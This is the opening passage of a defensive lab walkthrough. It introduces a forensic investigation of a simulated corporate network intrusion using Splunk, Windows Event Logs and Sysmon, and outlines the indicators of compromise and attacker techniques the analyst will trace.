This lab walkthrough focuses on analyzing a sophisticated cyber intrusion, uncovering the attacker's techniques, tactics, and procedures (TTPs) through forensic investigation. The scenario involves an adversary infiltrating a corporate network, establishing persistence, escalating privileges, and moving laterally across systems. By leveraging various security event logs, including Windows Event Logs and Sysmon data, we will dissect the attack timeline and track the adversary's movements from initial compromise to command and control (C2) communications.
Through Splunk searches and log analysis, we will identify key indicators of compromise (IOCs), including malicious scheduled tasks, encoded PowerShell commands, registry modifications, and unauthorized user account creations. Additionally, we will investigate lateral movement techniques, persistence mechanisms, and the use of common attack frameworks. By the end of this walkthrough, we will have a stronger understanding of how threat actors operate within an enterprise environment and how we, as analysts, can leverage SIEM tools to detect and mitigate such intrusions. The lab emphasizes real-world detection and investigative techniques, reinforcing the importance of log analysis, threat hunting, and defensive strategies in cybersecurity.
When